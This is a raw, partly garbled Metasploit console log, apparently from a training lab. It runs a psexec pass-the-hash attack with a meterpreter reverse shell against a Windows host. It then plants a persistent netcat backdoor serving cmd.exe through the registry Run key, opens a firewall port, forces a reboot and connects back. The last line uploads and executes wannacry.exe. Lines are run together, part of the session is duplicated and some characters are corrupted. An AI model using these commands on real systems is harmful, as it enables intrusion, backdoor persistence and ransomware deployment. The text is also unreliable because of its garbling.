
msf6 exploit(multi/handler) > back
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.56
RHOSTS => 192.168.1.56
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.1.53msf6 exploit(windows/smb/psexec) > set SMBUser xuegod
SMBUser => xuegodmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(windows/smb/psexec) > set SMBDomain WORKGROUPmsf6 exploit(windows/smb/psexec) > set SMBDomain WORKGROUP
SMBDomain => WORKGROUP
msf6 exploit(windows/smb/psexec) > exploitmsf6 exploit(multi/handler) > back
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.56
RHOSTS => 192.168.1.56
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(windows/smb/psexec) > set SMBUser xuegod
SMBUser => xuegod
msf6 exploit(windows/smb/psexec) set SMBPass
[-] Unknown command: 密�
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(windows/smb/psexec) > set SMBDomain WORKGROUP
SMBDomain => WORKGROUP
msf6 exploit(windows/smb/psexec) > exploit

meterpreter > getuid

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'meterpreter > shell
C:\Windows\system32> netsh firewall add portopening TCP 443 "xuegod443" ENABLE
ALLC:\Windows\system32>shutdown -r -f -t 0
-r 重启
-f 强制
-t 时间 0 表示立刻


C:\Users\xiangsi>netsatt -an

┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# nc -v 192.168.1.56 443C:\Windows\SysWOW64>exit

msf6 > connect 192.168.1.56 443

upload wannacry.exe c:\execute -f c:\wannacry.exe